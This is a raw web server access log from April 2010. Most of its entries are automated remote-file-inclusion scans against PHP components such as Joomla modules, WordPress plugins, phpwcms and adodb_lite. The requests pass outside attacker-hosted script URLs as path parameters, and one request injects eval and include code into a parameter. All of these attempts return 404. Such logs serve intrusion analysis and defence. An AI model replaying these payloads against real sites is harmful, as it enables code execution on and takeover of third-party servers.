211.239.124.204 - - [07/Apr/2010:09:52:29 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:52:30 -0500] "GET /logs/access_log.1267920000//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 387 "-""Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:09:52:30 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:09:53:03 -0500] "GET /logs//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:09:53:03 -0500] "GET //download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:09:53:03 -0500] "GET /logs/access_log.1268611200//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:56:20 -0500] "GET /logs/access_log.1267920000%20%20////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:56:20 -0500] "GET ////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:09:56:20 -0500] "GET /logs////index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:56:22 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:56:59 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:56:59 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:09:57:01 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
220.181.7.28 - - [07/Apr/2010:09:57:06 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.204.242 - - [07/Apr/2010:09:57:28 -0500] "GET /logs/access_log.1172275200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.129.228.250 - - [07/Apr/2010:10:00:33 -0500] "GET /logs/access_log.1217635200%20%20/htmltonuke.php?filnavn=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:10:00:33 -0500] "GET /logs/htmltonuke.php?filnavn=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:10:00:33 -0500] "GET /htmltonuke.php?filnavn=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:37 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:37 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:37 -0500] "GET /logs/access_log.1268611200%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:37 -0500] "GET /logs/access_log.1268265600%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:38 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:38 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:38 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:38 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:38 -0500] "GET /logs/access_log.1268265600//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:39 -0500] "GET /logs/access_log.1268611200%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:39 -0500] "GET /logs/access_log.1268265600%20%20//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:39 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:41 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:41 -0500] "GET /logs/access_log.1268265600//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:41 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:00:41 -0500] "GET /logs/access_log.1268611200//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:10:01:21 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.103.72.130 - - [07/Apr/2010:10:02:08 -0500] "GET /logs/access_log.1268611200//download.php?board_skin_path=http://wegus.shacknet.nu/priv/glup.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
83.103.72.130 - - [07/Apr/2010:10:02:08 -0500] "GET //download.php?board_skin_path=http://wegus.shacknet.nu/priv/glup.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
83.103.72.130 - - [07/Apr/2010:10:02:08 -0500] "GET /logs//download.php?board_skin_path=http://wegus.shacknet.nu/priv/glup.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
62.149.228.44 - - [07/Apr/2010:10:02:20 -0500] "GET /logs//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:10:02:20 -0500] "GET //download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:10:02:20 -0500] "GET /logs/access_log.1268611200%20%20//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
83.103.72.130 - - [07/Apr/2010:10:03:27 -0500] "GET //download.php?board_skin_path=http://wegus.shacknet.nu/priv/glup.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
62.149.228.44 - - [07/Apr/2010:10:03:44 -0500] "GET /logs/access_log.1268611200//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:10:03:44 -0500] "GET //download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.149.228.44 - - [07/Apr/2010:10:03:44 -0500] "GET /logs//download.php?board_skin_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:10:04:13 -0500] "GET /logs/access_log.1214784000%20%20/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.46.13.92 - - [07/Apr/2010:10:04:58 -0500] "GET /logs/access_log.1248480000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.129.228.250 - - [07/Apr/2010:10:05:32 -0500] "GET /logs/access_log.1217635200/htmltonuke.php?filnavn=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.195.112.180 - - [07/Apr/2010:10:06:29 -0500] "GET /?N=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [07/Apr/2010:10:08:02 -0500] "GET /logs/access_log.1214784000%20%20/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:08:58 -0500] "GET /logs/access_log.1257292800//bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:08:58 -0500] "GET /logs//bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:08:58 -0500] "GET //bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:09:03 -0500] "GET //bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:09:03 -0500] "GET /logs//bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:10:09:03 -0500] "GET /logs/access_log.1257292800//bulletin//skin/pqbig_board_blue/login.php?dir=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:10:40 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:10:40 -0500] "GET /logs/access_log.1235779200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 375 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:10:40 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:11:08 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:11:08 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.133.122.210 - - [07/Apr/2010:10:11:08 -0500] "GET /logs/access_log.1235779200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://smash1.fileave.com/zfxid1.txt%20? HTTP/1.1" 404 373 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:13:06 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:13:06 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:13:06 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.46.204.186 - - [07/Apr/2010:10:14:58 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.93.147.154 - - [07/Apr/2010:10:16:11 -0500] "GET /logs/access_log.1214784000/modules/Neos_Chronos/header.php?base_folder=http://janggu.com//janggu/data/file/img00.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:34 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:35 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:35 -0500] "GET /logs/access_log.1227398400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:50 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:51 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.121.63.153 - - [07/Apr/2010:10:22:51 -0500] "GET /logs/access_log.1227398400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:22:55 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:22:55 -0500] "GET /logs/access_log.1235779200%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:22:55 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:23:49 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:23:49 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:23:49 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hhjhh.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.149.254.73 - - [07/Apr/2010:10:25:21 -0500] "GET /logs/access_log.1247529600 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
207.46.199.189 - - [07/Apr/2010:10:32:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:10:33:01 -0500] "GET /logs/access_log.1235779200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fruehaufsteher.de/hpmaker/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
208.115.111.248 - - [07/Apr/2010:10:37:02 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
217.16.2.167 - - [07/Apr/2010:10:39:53 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:39:53 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:39:53 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:40:43 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:40:43 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:40:43 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.13.99 - - [07/Apr/2010:10:40:48 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.144.106 - - [07/Apr/2010:10:40:58 -0500] "GET /logs/access_log.1235779200%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
189.19.42.184 - - [07/Apr/2010:10:42:00 -0500] "GET /booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
189.19.42.184 - - [07/Apr/2010:10:42:00 -0500] "GET /logs/booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
189.19.42.184 - - [07/Apr/2010:10:42:00 -0500] "GET /logs/access_log.1220054400/booth.php?include_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:42:18 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:42:18 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:42:18 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:10:42:22 -0500] "GET /logs/access_log.1225929600//skin/zero_vote/error.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:10:42:22 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.16 - - [07/Apr/2010:10:42:22 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rittsound.com//components/com_akobook//id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:42:36 -0500] "GET /logs/access_log.1235779200%20%20/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.106.181 - - [07/Apr/2010:10:46:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.234 - - [07/Apr/2010:10:47:19 -0500] "GET /logs/access_log.1169683200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.129.228.250 - - [07/Apr/2010:10:47:27 -0500] "GET /logs/access_log.1268265600//admin.webring.docs.php?component_dir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:10:47:27 -0500] "GET //admin.webring.docs.php?component_dir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:10:47:27 -0500] "GET /logs//admin.webring.docs.php?component_dir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:48:07 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:48:27 -0500] "GET /logs/access_log.1228262400//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:48:27 -0500] "GET //index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:48:27 -0500] "GET /logs//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:48:27 -0500] "GET /logs/access_log.1214092800//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.144.106 - - [07/Apr/2010:10:48:42 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.13.146 - - [07/Apr/2010:10:49:19 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.46.157.102 - - [07/Apr/2010:10:50:01 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:50:01 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:50:01 -0500] "GET /logs/access_log.1219449600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.129.228.250 - - [07/Apr/2010:10:50:01 -0500] "GET /logs/access_log.1221696000//admin.webring.docs.php?component_dir=http://n1ngas.hdfree.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:51:29 -0500] "GET /logs/access_log.1228262400//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:51:29 -0500] "GET /logs//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:51:29 -0500] "GET /logs/access_log.1214092800//index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.70.32.2 - - [07/Apr/2010:10:51:29 -0500] "GET //index.php?site_path=http://pumaz.interfree.it/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
72.46.157.102 - - [07/Apr/2010:10:51:46 -0500] "GET /logs/access_log.1268956800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kcs.sc.kr/data/file/cb_c201004/84trnfg8tflnrh93-034p38jk?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.16.2.167 - - [07/Apr/2010:10:52:48 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://hms.co.il/id1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
207.46.204.189 - - [07/Apr/2010:10:53:18 -0500] "GET /logs/access_log.1189382400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.122.36.61 - - [07/Apr/2010:10:53:53 -0500] "GET /logs/access_log.1252368000//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
